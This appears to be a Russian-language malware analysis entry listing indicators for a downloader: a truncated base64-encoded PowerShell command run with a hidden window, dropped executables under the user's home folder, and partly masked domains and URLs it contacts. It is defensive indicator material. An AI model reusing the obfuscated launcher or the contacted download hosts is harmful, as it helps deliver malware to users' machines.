Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNADYAaABxADkAcAA1AD0AKAAoACcAUQAnACsAJwB0AHgAJwApACsAKAAnAGQAegBzACcAKwAnAGgAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdABlACcAKwAnAG0AJwApACAAJABlAE4AVgA6AHUAcwBlAFIAcABSAE8AZgBJAEwAZQBcAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1736
- %TEMP%\942292.cvr
- %HOMEPATH%\sqpgdfi\dqkgpwc\e2937a4y.exe
- %HOMEPATH%\sqpgdfi\dqkgpwc\e2937a4y.exe
- %HOMEPATH%\sqpgdfi\dqkgpwc\e2937a4y.exe
- 'fo#######nsathletefactory.com':80
- 'ge##ing.com':80
- 'ga###-music.com':80
- 'ev###erd.org':80
- 'gr##.net':80
- http://fo#######nsathletefactory.com/wp-admin/i/
- http://ge##ing.com/forum/p/
- http://ga###-music.com/cgi-bin/UM/
- http://ev###erd.org/cgi-bin/nUi/
- http://gr##.net/wp/C/
- DNS ASK fo#######nsathletefactory.com
- DNS ASK ge##ing.com
- DNS ASK ga###-music.com
- DNS ASK fr######telfarolillo.com
- DNS ASK ev###erd.org
- DNS ASK ga##smm.org
- DNS ASK gr##.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNADYAaABxADkAcAA1AD0AKAAoACcAUQAnACsAJwB0AHgAJwApACsAKAAnAGQAegBzACcAKwAnAGgAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdABlACcAKwAnAG0AJwApACAAJABlAE4AVgA6AHUAcwBlAFIAcABSAE8AZgBJAEwAZQBcAH...' (со скрытым окном)